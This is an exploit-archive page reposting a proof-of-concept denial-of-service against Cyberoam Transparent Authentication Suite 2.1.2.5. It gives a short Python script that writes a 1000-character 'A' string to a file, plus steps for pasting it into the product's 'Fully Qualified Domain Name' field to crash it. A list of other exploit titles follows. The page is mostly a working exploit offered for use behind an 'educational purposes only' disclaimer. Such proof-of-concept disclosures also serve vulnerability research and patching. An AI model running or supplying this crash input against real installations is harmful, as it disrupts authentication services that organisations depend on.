Cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-05-24 | Type : dos | Platform : windows
This exploit / vulnerability Cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
#Tested Version: 2.1.2.5
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ctas_fqdn_2.1.2.5.py
#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard
#3.- Open Cyberoam Transparent Authentication Suite
#4.- Select General > in Domain Type select "Microsoft Active Directory"
#5.- In "Fully Qualified Domain Name" paste Clipboard
#6.- Click on "Apply"
#7.- Crashed!

cod = "\x41" * 1000

f = open('ctas_fqdn_2.1.2.5.txt', 'w')
f.write(cod)
f.close()

Cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc) Vulnerability / Exploit